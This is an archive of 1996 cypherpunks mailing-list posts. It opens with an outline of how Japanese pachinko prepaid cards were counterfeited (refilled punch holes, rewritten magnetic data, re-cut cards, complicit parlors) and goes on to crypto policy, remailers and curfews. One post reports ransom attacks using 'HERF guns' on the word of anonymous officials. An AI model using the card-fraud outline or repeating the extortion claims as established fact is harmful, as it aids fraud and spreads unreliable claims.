communication and such.  I believe it designs the telephone card (debit card
used for pay-phone in Japan), too.

The pachinko card is the size of name card and plastic.  The details are not
published. To the best of my knowledge, I think there is a magnetic strip
that contains the card ID information such as its serial number and the
amount of debit money.

There were 10,000 yen, 5,000 yen, 3,000 yen, 2,000 yen, and 1,000 yen cards.
(I said "were" because 10,000 yen and 5,000 yen cards are no longer
available.)

Attack method:

>From what I saw and read, the first card verification mechanism used by the
pachinko game machine was so primitive to defy rational explanation: each
time the card was used, a tiny hole was punched to indicate the amount left
in the card. As the customer uses the card, the position of the punched hole
on card shifts toward the zero position. Once there is a hole on the zero
position, the card is no longer usable.

The first simple attack as far as I can tell was to fill in the hole in the
card with tiny plastic (essentially the chaff produced when the hole is
punched was used to fill in the hole).  I am not sure if such simple attack
was possible, but it seemed possible really at the beginning with crude
modification of the magnetic data.

Then, of course, the magnetic information on the card was also modified in
more sophisticated ways when the card was used.

However, the bad people also learned and somebody stole the reader mechanism
and figure out the part of the magnetically-coded information: the result
was that bad people could buy the pristine 10,000 yen card and then uses up
to 2500 yen of the debit amount legally and then "re-fill" the card to 9500
yen worth, thus gaining 2000 yen for free again and again.  (Until 3000 yen
was used from the 10,000 yen card, the physical hole was not produced on the
card, and only the magnetic information was changed. Hence the mere
counterfeiting of the magnetic information was necessary to "revive" the
card. No physical re-filling of the card was necessary. Physically
re-filling the hole is easy to spot visually and was avoided by the bad
guys.)

[I have to confess that the exact amount involved in the counterfeiting
is a little uncertain. But the general idea still holds.]

Similar attack was possible with 5,000 yen card.

Presumably the gain by attacking 3,000 yen, 2,000 yen and 1,000 yen card was
small compared with the risk, the bad guys didn't attack these cards until
lately.

Now the situation is that of cats and mouse.  New counterfeiting
methods and counter-measures follow each other in rapid succession.

I believe that the cloning of the card was also done. But I don't know the
details.

Now, the card companies and pachinko parlors stopped issuing 10,000 yen and
5,000 yen cards because the damage was so large.

Also, they have installed special readers to verify the validity of the card
by incorporating more vigourous checking not available on the readers next
to the game machine: it used to be that the cards sold could by used by any
pachinko parlors in Japan. Now cards sold elsewhere have to be verified with
this machine before used at a local game parlor. Cards sold at the local
parlor can be used without such checking.

Already, there are reports of counterfeit-card usage:

 - either the cards are so sophisticated that they can pass the enhanced
   reader.
 - Or the bad guys buy the cards locally and then use some of the
   debit amount and then bring the cards to their factory to re-fill
   and re-use it at the local store again and again.

The card companies have installed countermeasures in selected stores to the
cloning of the card by checking the serial number of the card and stopped
the operation of the whole game machines in the store if a card with the
serial number of the previously used (finished?) card is ever inserted into
the game machine.

Another simple method of fooling the reader was also reported about a month
ago. Essentially, it cuts out a long strip of the 3,000 yen card (now the
most expensive card after 10,000 yen and 5,000 yen card are gone) and
rotates the strip to invert its direction and then reassembles the card
again using cement or something. To my surprise, it was reported to be
deemed valid by some readers (!?). Apparently some readers only check for
the position of the hole on fixed position and fooled to believe the card is
valid if the hole is not in the expected position, etc.. Once not so
rigorous readers are distributed, it is very difficult to upgrade all of
them in Japan, I guess.

The problem is complicated in that the counterfeiting only damages the card
company. The parlors report the amount of debit money used in their shops
and then compensated for the amount (less the small surcharge by the card
company.)  This means that every time the counterfeit card is used the card
company alone loses money and the local parlor doesn't lose.

There have already been reports of the owners of the pachinko parlors
involved in the usage of the counterfeit cards.  These bad owners allowed
the bad guys to use the counterfeit cards in their parlors and pass the used
debit amount to the card company and getting compensated.

In these cases, the bad guys bring back the money (by simply exchanging the
phony debit money into the steel balls, and then without playing (they can
play if they wish), exchange the steel balls to the special gifts, and then
exchange the gifts with money. [Usually, buying the steel balls and then
exchanging them with gifts, and subsequently with money leaves you less
money than you started with. The house always wins. In this case, the bad
guys started out with counterfeit debit money and ends up with real money,
so it is OK for the bad guys.] The parlor also gets the money for the used
debit money. So they win, too.  Only the card companies lose.

Counterfeiting probably has existed since the first money (or equivalent)
was ever invented.  But, it surprised me that NTT Data approached the whole
scheme so naively, especially since there have been reports of telephone
card counterfeiting in Japan before.  Some of the counterfeiting methods
reported seemed so simple, and I have a doubt whether NTT Data was serious
enough to deter counterfeiting.

At least, I can safely say they have underestimated the ingenuity of the
counterfeiters badly and didn't learn from the counterfeiting of telephone
cards very well.

Ishikawa, Chiaki  (family name, given name)
Personal Media Corp., Shinagawa, Tokyo, Japan 142 ishikawa@personal-media.co.jp

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 2 Jun 1996 12:23:03 +0800
To: cypherpunks@toad.com
Subject: Compressed data vulnerable to known-plaintext?
In-Reply-To: <199606020009.CAA03429@basement.replay.com>
Message-ID: <Pine.LNX.3.93.960601212148.1195A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 2 Jun 1996, Anonymous wrote:

> Someone who claimed to be David F. Ogren said on Sat, 1 Jun 1996:
> 
> > > The brute force system decrypts the first, and second blocks (8
> > > bytes each) of the cyphertext, XORs them, and compares the result
> > > with "PKZIP2.1".  If the comparison is equal it has the key.
> 
> > I will concede that having a known header, such as a PKZIP header,
> > does weaken a crypto to certain degree, but I still believe that it is
> > not a significant problem.  Here's why:
> 
> Why not simply use two session keys, and encrypt the headers with one 
> while encrypting the actual data with the other? That seems to solve both 
> problems, except that more CPU cycles are required.

An easier solution would be to just strip of the headers.  If the header is
always the same, then it is redundant.  If it varies, then it cannot be used
as known-plaintext.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMbDtYrZc+sv5siulAQETVQP8DtIyI+pKr/cP7dNrQbnCeqSL+Dzu24ZR
4IL6FdaxYaGNQsT+GYBh1iFW++V1mtnyx8JNKKZ7huiLIMKqp1Iw+92q+tc+4T/o
Owd8a70Ld4rT6ma0pZOskLzLZCov4FitSfYKAonIsTYiMenmsYwo/rz6tdzKHPrg
oM6wdHfv1hg=
=fhBX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 2 Jun 1996 15:39:34 +0800
To: "'cypherpunks@toad.com>
Subject: RE: [Off-Topic]  "Curfews"
Message-ID: <01BB5005.1D2F0560@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Timothy C. May

Most of the ordinances, including the one here, specifically state that
"blanket permission" by parents is not acceptable. They want _specific_
reasons for being out after curfew.
...................................................................................

(sigh)

Once again, the individual is backed up against the wall and made to answer to the State ("specifically") for their behavior in the world of human action. 
("so who are you that I must explain myself to you?")

I was considering the inclination of the list membership to focus upon technological, rather than political, solutions to certain social problems.   Would a focus upon the idea of individual self-ownership & authority have any effect upon the State? 
(who *are* those people, anyway)

The State resorts to the use of forcible methods in order to keep their non-valuable citizens in line.  The citizens who feel themselves unfairly included resort to the use of technology to deal with impositions of the State upon them when their own ideas on morality are not accepted as legitimate.   

A lot of people talk about morality and justice, but really who gives a flip.  The place of these ideas in the everyday life of each person reduces to irrelevance in the face of all the ignorance and cynicism, and in consideration of the alternative technologies which can be used in place of reasoning, when reasoning makes no difference (when you can't force people to think, as often happens).

"I think it's time we re-evaluate the nature of our relationship".

     ..
Blanc








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Sun, 2 Jun 1996 12:28:11 +0800
To: cavouk@io.org
Subject: Class III InfoWar
Message-ID: <199606020133.VAA17985@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


Feel Free To Distribute Widely:

Class III Information Warfare: Has It Begun?

The June 2, 1996 Sunday Times from London front page headline reads:
"City Surrenders to L400 million Gangs"

And HERF Guns, Electromagnetic Pulses and sophisticated logic bombs may be 
responsible.

At InfoWarCon II, Montreal Canada, I made reference to investigations I was 
conducting regarding concerted and organized attacks on up to 43 financial 
institutions in Europe and the US; an example of Class III Information Warfare. 
This issue of London Sunday Times brings a glimpse of the story that will 
eventually be told.

The first attack in my files dates to January 6, 1993. A trading house in London 
was blackmailed into paying L10million to unknown extortionists who demonstrated 
they could crash the company's computers at will. The next incident in the Times 
article is also in my files: January 14, 1993 where similar demonstrations and 
demands were made for this time L12.5Million. And so is the next, January 29, 
1993 and another L10Million siphoned off by the bad guys. According to my 
figures and those in the Times article, hundreds of millions of pounds have been 
paid ransom in what is clearly an example of Class III Information Warfare.

According to officials in Washington, Whitehall, London, City of London Police, 
the National Security Agency, Kroll Associates, Bank of  England and others (in 
the article) the threats are credible. The attackers have the clear ability to 
bring trading and financial operations to a halt - exactly when they say they 
will. "Banks, brokerage firms and investment houses in America have also 
secretly paid ransom to prevent costly computer meltdowns and a collapse in the 
confidence  among their customers," sources said in the article.

The article discussed the advanced information warfare techniques used by the 
perpetrators. "According to the American National Security Agency (NSA), they 
have penetrated computer systems using 'logic bombs' (coded devices that can be 
remotely detonated), electromagnetic pulses and 'high emission radio frequency 
guns' which blow a devastating electronic 'wind' through the computer systems." 
[For a complete description of HERF Guns (coined by Schwartau in 1990), see 
"Information Warfare: Chaos on the Electronic Superhighway," Thunders Mouth 
Press, 1994] 

The perpetrators have also left encrypted messages, apparently bypassing the 
highest security levels of the systems, leaving messages such as "Now do you 
believe we can destroy your computers?" The NSA and other officials believe that 
four gangs are involved; probably one from the US and probably one from Russia. 
But, because the crimes are international, national borders still prevail, 
making investigation more difficult. Investigations and official inquiries have 
been in progress for some time according to the article.

Now, for a few things you will not see in the articlem, but will hopefully [if I 
am lucky] come out in the near future. The number of attacks is way above 40. 
They have been known about for almost three years, but only recently have people 
been willing to come out of the closet and discuss this highly sensitive issue 
with the media. Long briefs and analyses of these events have been submitted to 
high level officials and select business persons for at least a year, but to no 
avail. [Security by obscurity reigns all too often.] Banking is not the only 
industry that has been attacked and the attacks have been spread around Europe 
as well as Australia.

As an industry many of us have said that the only way something will really be 
done is if we experience a Computer Chernobyl [Peter Neumann Phrase as I recall] 
or as I first said in Congressional Testimony, An Electronic Pearl Harbor. Are 
these events the harbinger of strong reaction by the community at large? As 
events unfold and more information is permitted to be disseminated over the next 
few days and weeks, we will see.

We have essentially solved the issues of confidentiality and integrity. But, I 
have maintained that the real problem is going to be Denial of Service. These 
events are unfortunate, but clear examples of that reality. 

A Bank of England official also said of the incidents, "it is not the biggest 
issue in the banking market."  Hmmm. I have to think about that.



Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sun, 2 Jun 1996 08:13:02 +0800
To: cypherpunks@toad.com
Subject: Re: [Off-Topic] "Curfews"
In-Reply-To: <add4f01401021004d019@[205.199.118.202]>
Message-ID: <9606012134.aa29661@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


	I agree with Tim May on this - it's a draconian solution to crime.
I've heard claims made that it reduces crime - I wonder if that's true and if
so, would that still be true in the long term.

	A quick web search produced a case of a teenager who broke the law
talking to a friend outside her own family's home. I guess that it wouldn't be
wise to allow a child to use a telescope outside - there goes astronomy.

	The hardest hit will probably be homeless children - especially those
who have run away from abuse - they'll be getting a criminal record if they're
caught a few times during curfew.

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sun, 2 Jun 1996 07:11:28 +0800
To: cypherpunks@toad.com
Subject: Re: Statistical analysis of anonymous databases
In-Reply-To: <v02120d02add5829399c2@[192.0.2.1]>
Message-ID: <Pine.HPP.3.91.960601202706.4656A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 31 May 1996, Lucky Green wrote:

> HSS needs to verify that the researcher didn't just make up the data. The
> Department therefore has to be able to audit the results of the study by
> contacting a small subset of the participants directly. How can the
> Department contact the participants if they are known only under their
> nyms?

The evaluation of medical, and other, research is based on trust.
Some scientific journals are more trusted than others. Some research
institutions/heads of institutions are more trusted than others.
Original medical data are very rarely checked by outsiders, and if they
are the participating physical entities (patients) are never involved.
Verifying studies by other groups are usually needed before anything
is taken for a truth. So, in medical research in general, de-identified
data are perfectly useful.

In long-term epidemiological research identities are a big plus, though,
but for another reason than checking for scientific cheating. F ex,
the addition of a life-time SSN to peoples' credit cards would make it
possible in 50 years, when the 20-year old's of today start dying, to
compare causes of death with the items in the grocery store data banks
of today, finally deciding the cholesterol controversy (and other
things to make us live longer).

The Swedish National Medical Registry, where all diagnoses and surgical
procedures relating to hospital stays are entered, was de-identified
(except for year of birth) in 1993, by order from the Bureau of Data
Inspection. The epidemiologists haven't been able to sleep since, and
now there is a legislative initiative to enter full identities (our
infamous Person Numbers) again. I think it will pass.

In the discussions of this legislative initiative it has become
public knowledge that the database isn't even encrypted, and those
responsible for it see no need for changing this, since it's not
publically available. Epidemiologists are usually as naive as they
come.


Asgaard








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 2 Jun 1996 12:52:00 +0800
To: cypherpunks@toad.com
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <2.2.32.19960602015920.00b2dfb8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 PM 5/31/96 -0700, Timothy C. May wrote:
>(Some purists claim that children are exempted from normal constitutional
>protections, such as the right of free association, the right to be free
>from unwarranted searches and seizures, the right of free speech, etc.

I'm afraid that some courts have explicitly held that "the child does not
have a right to liberty but only a right to custody."  That is old law,
however.  Kids have lost many rights recently too including gun rights, etc.

>So Santa Cruz begins its own fascist crackdown on the free movements of
>persons. The "curfew" begins Saturday night.

Of course curfew laws only control the inarticulate and scruffy.  Well
dressed children (coat and tie for the boys dress or suit for the girls) who
can claim that they are out doing tons of protected things like work and
school and worship and political campaigning and "trying to save street
children for Jesus" will not be picked up.  They can also say things like
"Ossifer, I'm peaceably assembling to petition the government for redress of
grievances.  It's in the First Amendment.  You could read about it and
everything."  

Home schooled children face this problem frequently and can usually find
something to say.  Kids older than 15 or so can claim to be "emancipated
minors."  Parents can emancipate their children by signing a simple
declaration to back up this claim.  A good idea in any case.  You don't want
to be accused of "owning slaves just like Thomas Jefferson."  Parents can
also give their kids blanket notes of permission to be out on the streets.

DCF

"Whose children never got stopped by cops because at 14 they passed for 21.
Clothing and bearing alone can do it."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ezekiel@alpha.c2.org
Date: Sun, 2 Jun 1996 16:39:30 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606020532.WAA28053@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



winn@Infowar.Com wrote:
> 
> The article discussed the advanced information warfare techniques used by the 
> perpetrators. "According to the American National Security Agency (NSA), they 
> have penetrated computer systems using 'logic bombs' (coded devices that can be 
> remotely detonated), electromagnetic pulses and 'high emission radio frequency 
> guns' which blow a devastating electronic 'wind' through the computer systems." 
> [For a complete description of HERF Guns (coined by Schwartau in 1990), see 
> "Information Warfare: Chaos on the Electronic Superhighway," Thunders Mouth 
> Press, 1994] 
> 

Thanks for the info (and for the excellent book, by the way).

Can you explain in little detail what are these logic bombs?

Also, why these institutions do not install protection from HERF radiation
and TEMPEST-type protection from information leaks? Do they think that
paying ransom is cheaper than all investment in IW-protection?

thanx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 2 Jun 1996 10:12:09 +0800
To: cypherpunks@toad.com
Subject: NSCP, PRZ Hit NRC Crypto Rec
Message-ID: <199606012246.WAA00647@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Netscape (WSJ) and PRZ (Globe) say the NRC crypto 
   export recommendations don't go far enough. 
 
   ---------- 
 
   Wall Street Journal, May 31, 1996, p. B5. 
 
 
   U.S. Strategy Should Promote Computer Codes 
 
      Panel Says a Free Market Is Best Policy, Urges Easing of 
      Export Curbs 
 
   By John J. Fialka 
 
 
   Washington -- The federal government should promote rather 
   than discourage widespread commercial use of powerful codes 
   that can protect electronic communications, a panel 
   sponsored by the National Research Council recommended. 
 
   The government also should relax its export controls on 
   such codes, according to the 16-member panel, which 
   included a mix of business, academic and government 
   experts. The NRC is an affiliate of the National Academy of 
   Sciences, a private, nonprofit organization that advises 
   the government on scientific matters. 
 
   Encryption coding software scrambles computer data by using 
   mathematical formulas that can't be read if intercepted. 
   Only personnel with the correct "keys" can access the data. 
 
   More Study Needed 
 
   The NRC study, which took 18 months to complete, calls for 
   greater trust in freemarket demands for protection and less 
   reliance on the U.S. National Security Agency and the 
   Federal Bureau of Investigation to set the nation's code 
   policy. It said the two agencies' recent promotion of 
   "escrowed encryption," in which the government would hold 
   a mathematical key to unlock codes, requires further study 
   because it poses liability risks and introduces weakness 
   into information protection systems. 
 
   Kenneth W. Dam, a University of Chicago law professor who 
   headed the panel, said changes are needed to counter "an 
   explosion of computer-based crime" and other forms of 
   espionage that threaten U.S. companies' ability to protect 
   proprietary information, especially overseas. 
 
   By promoting the use of more-elaborate codes, U.S. 
   law-enforcement agencies would be better prepared to ward 
   off hacker or terrorist attacks on the nation's electric 
   power grid, banking and telecommunications systems and its 
   air-traffic control networks, he added. 
 
   Potential Problems 
 
   Mr Dam said the widespread use of encryption by private 
   business is "inevitable" and the government must "recognize 
   this changing reality." 
 
   The report noted that the FBI has argued for years that its 
   law-enforcement efforts would be hampered if drug cartels 
   and other organized criminals began using codes that 
   couldn't be deciphered. Courtordered wiretaps, a major tool 
   used to break organized-crime cases, could become useless, 
   the FBI has contended. 
 
   Edward Schmults, general counsel for GTE Corp. and a former 
   deputy attorney general during the Reagan administration, 
   said he and other panel members believe the FBI and other 
   law-enforcement agencies would be helped more than hurt if 
   legitimate businesses were better protected. "It's a 
   balancing issue," he said. 
 
   Spokesmen for the FBI and NSA referred questions to the 
   White House, where an official said the Clinton 
   administration disagrees with the panel's recommendation to 
   relax export controls and wants to continue to explore the 
   use of escrows by private industry to keep the keys to 
   powerful codes. "We have equities to protect that the 
   people who wrote the NRC report do not," he said. 
 
   The administration, he said, still wants to review the 
   export of more powerful codes on a case-by-case basis. The 
   use of private, third-party escrows, he said, might be one 
   way to protect the secrecy of companies while allowing 
   federal agents with court orders access to code keys. 
 
   New Markets Would Open 
 
   The panel called for the U.S. to permit the export of codes 
   containing a "56-bit" Data Encryption Standard algorithm. 
   The algorithm, or formula, was developed by the National 
   Bureau of Standards in 1975 and is 65,000 times tougher to 
   break than current "40-bit" codes that are permitted for 
   unlicensed exports. 
 
   The panel estimated its recommendations would open up new 
   markets for information security products, possibly 
   increasing software-industry revenue "many tens of billions 
   of dollars." Until now, export controls tended to set 
   industry standards for a level of protection because 
   companies were reluctant to use different systems for 
   domestic and international applications. 
 
   Jeffrey Treuhaft, director of security at Internet software 
   giant Netscape Communications Corp., welcomed the report, 
   but said exports shouldn't be limited to 56-bit keys. That 
   would still blunt the competitive edge of U.S. software 
   vendors, given that code-cracking computer power is 
   multiplying, he said. 
 
   "The U.S. has a lead right now and these arcane policies 
   from the Cold War are giving U.S. industry cement shoes to 
   compete with foreign competitors," Mr. Treuhaft said. "We 
   can't run as fast as they ean." 
 
   - Jared Sandberg in New York contributed to this article. 
 
   [End] 
 
---------- 
 
   The Boston Globe, May 31, 1996, p. 36 
 
 
   Panel criticizes US government's encryption stand 
 
      'Net, cell phone security at stake, National Research 
      Center says 
 
   By Hiawatha Bray 
 
   The Clinton administration's efforts to limit the sale of 
   software that generates coded messages, already unfire from 
   Congress and civil libertarians, is now facing criticism 
   from a committee of the National Academy Sciences. 
 
   The National Research Center, which gives science and 
   technology advice under a congressional charter, yesterday 
   said the government should promote the commercial use of 
   encryption software to help cut down on the theft of 
   computer data and other electronic communications. 
 
   Law enforcement officials and intelligence agencies are 
   worried about the development of cheap encryption grams, 
   for fear it could become impossible to intercept a 
   mobster's telephone call or read an enemy spy's electronic 
   mail messages. 
 
   But the center's report says that encryption software is 
   essential for businesses and individuals who need to 
   transmit confidential data using the Internet or cellular 
   telephones. 
 
   "On balance, the advantages of more widespread use of 
   cryptography outweigh the disadvantages," the report says. 
 
   Encrypted messages can easily be read by someone with the 
   correct code "key." Without this key, it can take centuries 
   of computer analysis to decode a message. The longer the 
   key, the tougher it is to break the code. 
 
   Under current federal law, US companies cannot export 
   encryption programs that use keys longer than 40 bits. 
   Computer experts say that 40-bit encryption systems are 
   easy to break, and provide little security. 
 
   As a result, many software companies that sell their 
   products worldwide do not build in sophisticated encryption 
   features. Industry experts say that this costs them 
   millions of dollars in sales, as customers in foreign 
   countries buy encryption software made outside the United 
   States. 
 
   The report urges a change in the federal law, to allow sale 
   of an encryption system called DES that uses 56-bit keys. 
   "Except in some very specialized situations, it gives 
   adequate security," said council chairman Kenneth Dam, a 
   law professor at the University of Chicago. 
 
   The report also urges the administration to abandon efforts 
   to force businesses and individuals to use "key escrowed" 
   encryption software. Under this plan, companies could use 
   encryption, keys of any length, but only if the keys were 
   held in escrow, and could be made available to the 
   government. 
 
   The council urges the federal government to adopt key 
   escrow to prove that the system is trustworthy. The report 
   argues that many businesses will voluntarily adopt such a 
   plan to guard against the loss of its encryption keys. 
 
   A prominent critic of encryption policy was less than 
   thrilled by-the council report. "It doesn't go far enough," 
   said Philip Zimmermann, inventor of the Pretty Good Privacy 
   encryption program. 
 
   Zimmermann scoffed at the idea that DES encryption is 
   secure enough for use by businesses. "It can be broken in 
   seconds by the NSA [National Security Agency]," Zimmermann 
   said. "All major governments can break DES. In fact, any 
   Fortune 500 company can afford a machine that can break 
   DES." 
 
   But even if DES were secure enough, Zimmermann said he 
   opposes any restrictions on the export of encryption 
   software. 
 
   [End] 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 2 Jun 1996 17:50:16 +0800
To: cypherpunks@toad.com
Subject: Re: Multiple Remailers at a site?
Message-ID: <199606020659.XAA25720@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>I don't think multiple remailers at the same site help anything.

Assume Alice, Bob, and Carol are on abc.com and Xenu, Yak, and Zut
are on xyz.com.  Remailing between Alice, Bob, and Carol doesn't
make appear to make much difference, but it does reduce the damage
if one of the remailer's keys is compromised.  On the other hand,
mail from Alice -> Xenu -> Bob -> Yak -> Carol -> Zut adds traffic
to the system, and makes traffic analysis more difficult,
even if the Bad Guys are watching site abc.com and have stolen
Alice, Bob, and Carol's keys.

The other threat it helps with is that if XYZ.COM gets complaints
about that evil user Zut, she can kick her off (Bad Zut!)
and still leave Xenu and Yak alone; if the remailer service
were provided by the machine owner herself she might be directly liable.
#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Rescind Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 2 Jun 1996 18:15:22 +0800
To: cypherpunks@toad.com
Subject: How can you protect a remailer's keys?
Message-ID: <199606020659.XAA25725@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Encryption is critical for protecting against traffic analysis,
but it's tough to protect a remailer's keys.  Unlike regular email,
where you can type the key in as you read it, remailers need to
run automatically once you set them up.  Some of the choices are:
- leave it around in plaintext with only Unix file protections
        (Ghio2 works this way - does Mixmaster?  My ghio2 version has it 
        compiled into the binary, and I try to delete it from source.)
- type it in to a long-running remailer process 
        (with human intervention to start)
- SSL-based remailers, where the web server handles crypto on
        a per-machine basis instead of per-remailer
- use unauthenticated Diffie-Hellman (either hanging off
        a TCP port somewhere instead of mail, or
        3 pieces of email)
- off-line or off-site remailer such as a POP3 winsock remailer
        that makes it Somebody Else's Problem, and separates
        the remailer's public interface from the working parts
- human intervention on every message (which may not be totally
        worthless for moderated news postings, if you want to
        take that approach to spam prevention.)

Anybody have any other approaches?  These are mostly weak,
annoying, or both.


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Rescind Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 2 Jun 1996 15:25:01 +0800
To: cypherpunks@toad.com
Subject: Re: Compressed data vulnerable to known-plaintext?
In-Reply-To: <199606020213.TAA00981@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960602001039.2658A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 1 Jun 1996 anonymous-remailer@shell.portal.com wrote:

> But then you still have the problem of identifying the contents.  If there
> were no headers, one could not tell if the message was compressed using
> ZIP, LHA, StuffIt, tar*, compress, gzip, Alice's Magical Supercompressor,
> or even if it was left alone.  One could also not tell if the decryption
> happened successfully.

OK, I think I misunderstood.  You were talking about encrypting a file that
has already been compressed and I was talking about an encryption program that
would compress then encrypt.  In the latter case, headers would be completely
unnecessary, whereas in the former, they are necessary.  Generally, checksums
or parity bits are much better ways of checking if the decryption was
successful.  While this does make cryptanalysis easier, a known-plaintext will
not work.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMbEWH7Zc+sv5siulAQFA0gP9FMd68l1J8K12FDLkx5+p5j0TwrAlCLn0
cqSHVouOw2mhqk1LEgxMBPuI+6Vw2Bnzhj8QxDz7Qjjs98Jqu4p+4ky9FLzVn4vh
oGi2j/W0P1onLi4bSoq6u1SE8vPCNRresTox36DMWOMSN4Lxybx363xDx+8vD627
5D9n3fW5e/0=
=V+t3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sun, 2 Jun 1996 18:48:11 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Riding online elevators  (Was CNN: Anonymous Stock Tips)
In-Reply-To: <199606020638.IAA15227@basement.replay.com>
Message-ID: <199606020800.BAA15224@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In my mail this morning was this bit of spam, I never heard of this guy 
> before, Likely scooped my mailing address from misc.invest.stocks.
> 
> -Newman
> 
> --Fwd--
> >http://chancellor.stockpick.com
> >
> >I just got wind that Chancellor Group is reporting big quarterly earnings.
> >SGA Goldstar is just sending out a "buy" recommendation.  I understand other 
    ...     
    No. Seems to have gone to all cypherpunks.  I've never heard of 
    misc.invest.stocks.

    b




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 2 Jun 1996 17:41:59 +0800
To: winn@Infowar.Com
Subject: Re: Class III InfoWar
In-Reply-To: <199606020133.VAA17985@mailhost.IntNet.net>
Message-ID: <v03006f01add6d281719d@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:33 -0400 6/1/96, winn@Infowar.Com wrote:


>The article discussed the advanced information warfare techniques used by the
>perpetrators. "According to the American National Security Agency (NSA), they
>have penetrated computer systems using 'logic bombs' (coded devices that
>can be
>remotely detonated)

Unless the definition has changed recently, a "logic bomb" is normally a
piece of code in a program that is triggered when a specific event occurs
(such as the programmer's name not appearing in a payroll file for a
designated period of time [which might trigger a salami round off routine
to start cutting checks 2 months after s/he is no longer working for the
company]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 2 Jun 1996 12:20:52 +0800
To: cypherpunks@toad.com
Subject: NRC Report, Appendices
Message-ID: <199606020123.BAA11417@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Appendices A-D: 
 
      http://pwp.usa.pipeline.com/~jya/nrca-d.txt  (187 kb) 
 
   With images of Tables D.1 and D.2 for Appendix D: 
 
      http://pwp.usa.pipeline.com/~jya/nrcd1.jpg  (101 kb) 
      http://pwp.usa.pipeline.com/~jya/nrcd2.jpg  (118 kb) 
 
 
   Appendices E-N: 
 
      http://pwp.usa.pipeline.com/~jya/nrce-n.txt  (199 kb) 
 
 
   ---------- 
 
   Thanks to DN. 
 
   ---------- 
 
                         APPENDICES 
 
   A  Contributors to the NRC Project on National Cryptography 
      Policy 
 
   B  Glossary 
 
   C  A Brief Primer on Cryptography 
 
   D  An Overview of Electronic Surveillance: History and 
      Current Status 
 
 
   E  A Brief History of Cryptography Policy 
 
   F  A Brief Primer on Intelligence 
 
   G  The International Scope of Cryptography Policy 
 
   H  Summary of Important Requirements for a Public-Key 
      Infrastructure 
 
   I  Industry-Specific Dimensions of Security 
 
   J  Examples of Risks Posed by Unprotected Information 
 
   K  Cryptographic Applications Programming Interfaces 
 
   L  Laws, Regulations, and Documents Relevant to 
